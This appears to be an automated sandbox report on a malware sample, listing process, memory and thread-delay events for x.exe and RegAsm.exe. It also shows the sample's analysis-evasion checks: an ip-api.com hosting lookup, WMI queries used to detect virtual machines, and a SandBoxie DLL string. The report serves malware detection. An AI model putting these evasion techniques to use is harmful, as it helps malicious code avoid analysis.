Source: C:\Windows\System32\wbem\WMIADAP.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: x.exe, 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 4C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 5290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 6290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 63C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 73C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 47B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598215	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597979	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597616	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597275	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596935	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596257	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595137	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3362	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3065	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3510	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6331	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1589	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1117	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 669	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 1622	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Window / User API: threadDelayed 916	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 940	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 4984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6180	Thread sleep count: 35 > 30	Jump to behavior
